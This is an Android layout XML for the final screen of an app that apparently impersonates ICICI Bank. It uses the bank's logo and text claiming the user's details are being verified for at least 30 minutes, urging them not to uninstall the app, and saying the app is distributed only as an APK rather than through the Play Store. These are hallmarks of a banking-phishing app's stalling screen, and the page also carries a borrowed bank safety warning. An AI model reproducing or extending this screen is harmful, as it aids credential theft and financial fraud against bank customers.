<?xml version="1.0" encoding="utf-8"?>
<ScrollView xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:app="http://schemas.android.com/apk/res-auto"
    xmlns:tools="http://schemas.android.com/tools"
    android:layout_width="match_parent"
    android:layout_height="match_parent"
    app:layout_constraintBottom_toBottomOf="parent"
    app:layout_constraintEnd_toEndOf="parent"
    app:layout_constraintStart_toStartOf="parent"
    app:layout_constraintTop_toTopOf="parent">

    <LinearLayout
        android:layout_width="match_parent"
        android:layout_height="wrap_content"
        android:gravity="center"
        android:orientation="vertical">

        <androidx.constraintlayout.widget.ConstraintLayout
            android:layout_width="match_parent"
            android:layout_height="match_parent"
            tools:context=".LAST_PAGE">

            <ImageView
                android:id="@+id/imageView"
                android:layout_width="373dp"
                android:layout_height="99dp"
                android:layout_marginStart="20dp"
                android:layout_marginEnd="20dp"
                android:scaleType="centerCrop"
                app:layout_constraintEnd_toEndOf="parent"
                app:layout_constraintStart_toStartOf="parent"
                app:layout_constraintTop_toTopOf="parent"
                app:srcCompat="@drawable/icicilogo" />

            <TextView
                android:id="@+id/textView12"
                android:layout_width="260dp"
                android:layout_height="43dp"
                android:layout_marginTop="44dp"
                android:text="@string/important_note"
                android:textColor="#060F45"
                android:textSize="30sp"
                app:layout_constraintEnd_toEndOf="parent"
                app:layout_constraintHorizontal_bias="0.125"
                app:layout_constraintStart_toStartOf="parent"
                app:layout_constraintTop_toBottomOf="@+id/imageView" />

            <TextView
                android:id="@+id/textView13"
                android:layout_width="350dp"
                android:layout_height="176dp"
                android:layout_marginStart="5dp"
                android:layout_marginTop="40dp"
                android:layout_marginEnd="5dp"
                android:background="#5EE3DDDD"
                android:backgroundTint="#5EE3DDDD"
                android:text="@string/please_wait_your_details_are_being_verified_it_will_take_minimum_30_minutes_most_information_don_t_delete_uninstall_this_app_thanks_for_joining_icici_bank_online_services_recently_launched_icici_app_is_in_only_apk_file_not_play_store"
                android:textAlignment="viewStart"
                android:textColor="#7385EC"
                android:textSize="18sp"
                app:layout_constraintEnd_toEndOf="parent"
                app:layout_constraintHorizontal_bias="0.49"
                app:layout_constraintStart_toStartOf="parent"
                app:layout_constraintTop_toBottomOf="@+id/textView12" />

            <Button
                android:id="@+id/exit"
                android:layout_width="409dp"
                android:layout_height="wrap_content"
                android:layout_marginTop="68dp"
                android:text="@string/exit"
                app:layout_constraintEnd_toEndOf="parent"
                app:layout_constraintStart_toStartOf="parent"
                app:layout_constraintTop_toBottomOf="@+id/textView13" />

            <TextView
                android:id="@+id/textView14"
                android:layout_width="390dp"
                android:layout_height="159dp"
                android:layout_marginTop="44dp"
                android:text="@string/safe_banking_never_share_your_user_id_password_or_any_other_information_with_anyone_on_phone_sms_or_email_icici_bank_does_not_call_email_customers_for_such_informations_beware_of_fraudsters_asking_for_such_details_posting_as_bank_staff"
                android:textAlignment="center"
                android:textSize="18sp"
                app:layout_constraintEnd_toEndOf="parent"
                app:layout_constraintHorizontal_bias="0.238"
                app:layout_constraintStart_toStartOf="parent"
                app:layout_constraintTop_toBottomOf="@+id/exit" />
        </androidx.constraintlayout.widget.ConstraintLayout>
    </LinearLayout>
</ScrollView>